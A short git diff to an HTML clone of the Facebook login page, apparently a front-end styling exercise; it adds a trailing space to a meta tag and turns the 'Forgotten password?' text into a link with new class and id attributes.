--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-    <meta charset="UTF-8">
+    <meta charset="UTF-8"> 
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>facebook - log in or sign up</title>
     <link rel="stylesheet" href="style.css">
@@ -15,7 +15,7 @@
                 <input type="text" name="username" placeholder="Email address or phone number" class="username"><br>
                 <input type="password" name="password" placeholder="Password" class="password"><br>
                 <button class="btn-log"><b>Log in</b></button><br>
-          <center class="a">Forgotten password?</center> 
+          <center class="for-center"><a href="" id="for-pass">Forgotten password?</a></center> 
           <hr class="line">
           <button class="btn-cre">Create new account</button>
             </div>
